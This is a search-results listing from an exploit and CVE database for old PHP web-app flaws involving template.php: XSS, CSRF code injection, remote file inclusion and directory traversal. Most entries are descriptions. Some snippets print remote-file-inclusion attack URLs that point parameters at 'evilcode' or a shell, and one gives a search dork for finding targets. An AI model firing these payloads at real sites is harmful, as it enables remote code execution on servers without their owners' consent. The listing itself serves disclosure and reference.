138 matches found
CVE-2012-0283
DokuWiki vulnerability CVE-2012-0283: XSS in tpl_mediaFileList (inc/template.php) allows injection via the ns parameter in medialist action to lib/exe/ajax.php. Affected: DokuWiki releases prior to 2012-01-25b; exploit could deliver arbitrary HTML/script. Remediation: upgrade to the latest DokuWi...
4images 1.7.6 > 9 Csrf inject php code
Exploit for php platform in category web applications !/usr/bin/perl Title : 4images 1.7.6 9 Csrf inject php code Author : Or4nG.M4n Version : 1.7.6 9 Homepage : http://www.4homepages.de/ Dork : "Powered by 4images" video : http://youtu.be/NYFzC9hH54 Thnks+----------------------------------+ | xS...
4Images 1.7.6-9 - Cross-Site Request Forgery PHP Code Injection
4Images 1.7.6-9 - Cross-Site Request Forgery PHP Code Injection !/usr/bin/perl Title : 4images 1.7.6 9 Csrf inject php code Author : Or4nG.M4n Version : 1.7.6 9 Homepage : http://www.4homepages.de/ Dork : "Powered by 4images" video : http://youtu.be/NYFzC9hH54...
4Images 1.7.6 Cross Site Request Forgery
!/usr/bin/perl Title : 4images 1.7.6 9 Csrf inject php code Author : Or4nG.M4n Version : 1.7.6 9 Homepage : http://www.4homepages.de/ Dork : "Powered by 4images" video : http://youtu.be/NYFzC9hH54 Thnks+----------------------------------+ | xSs m4n i-Hmx h311c0d3 |.sp. abo.B4sil | HcJ Cyb3r...
CVE-2011-3745
HycusCMS 1.0.3 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by templates/hycustemplate/template.php...
Wordpress 3.2.1 Core Module(post-template.php) Improper Sanitizing XSS
Exploit for php platform in category web applications Exploit Title : Wordpress 3.2.1 Core Module(post-template.php) Improper Sanitizing (Persistent Cross Site Scripting) Vulnerability Author : Darshit Ashara Date : 21/08/2011 Vendor : Wordpress Version: 3.2.1 Software Link...
Uigaproxy Remote File Inclusion
coded by ahmadbady //=========================================================================== // Topic : uigaproxy // Bug type : remote file include // Download : http://www.scriptdevelopers.net/download/uigaproxy.zip // Advisory :...
CVE-2010-1216
The CVE-2010-1216 entry concerns PHP remote file inclusion in notsoPureEdit prior to or including version 1.4.1, triggered when register_globals is enabled. The vulnerability allows an attacker to execute arbitrary PHP code by supplying a URL in the content parameter, via a crafted request to tem...
NotSopureEdit <= 1.4.1 Remote File Include Vulnerability
NotSopureEdit <= 1.4.1 Remote File Include Vulnerability...
WordPress <2.0.6 Template.php Cross-Site Scripting Vulnerability
No description provided by source...
CVE-2008-5860
Directory traversal vulnerability in backend/template.php in Constructr CMS 3.02.5 and earlier, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to create or read arbitrary files via directory traversal sequences in the editfile parameter...
Directory traversal
Directory traversal vulnerability in backend/template.php in Constructr CMS 3.02.5 and earlier, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to create or read arbitrary files via directory traversal sequences in the editfile parameter...
ezringtone-disclose.txt
Ez Ringtone Manager Multiple Vulnerabilities. Discovered by b3hz4d. WwW.DeltaHacking.Net. APA Center of Yazd University...
Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities
Exploit for unknown platform in category web applications. Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities. AUTHOR : b3hz4d Seyed Behzad...
Chupix CMS 0.2.3 - 'repertoire' Remote File Inclusion
chupix 0.2.3 /admin/include/header.php RFI f0und by 0in contact: [email protected] Greetings to: Die-angel, Slim, Joker186, Kaja, Artysta, wojto111, reydex team: Our Dark-Coders team;...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in myBloggie 2.1.5 allow remote attackers to execute arbitrary PHP code via a URL in the bloggierootpath parameter to (1) config.php; (2) db.php, (3) template.php, (4) functions.php, and (5) classes.php in includes/; (6) viewmode.php; and (7) blogbody.php. NOT...
mybloggie-rfi.txt
myBloggie 2.1.5 RFI Author: Yaser Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=19 Exploits: http://site/config.php?bloggierootpath=evilcode? http://site/includes/db.php?bloggierootpath=evilcode? http://site/includes/template.php?bloggierootpath=evilcode?...
MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
MyEvent1.6 template.php Remote File Inclusion Vulnerability Author: Yaser [email protected] Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=6 ERROR: includeonce$myeventpath.'includes/template.php' Exploit: http://site/PaTh/includes/template.php?myeventpath=she...
Directory traversal
Multiple directory traversal vulnerabilities in Scallywag 2005-04-25 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skinname parameter to template.php in (1) skin/dark/, (2) skin/gold/, or (3) skin/original/, a different vector than CVE-2007-2900. NOTE: the...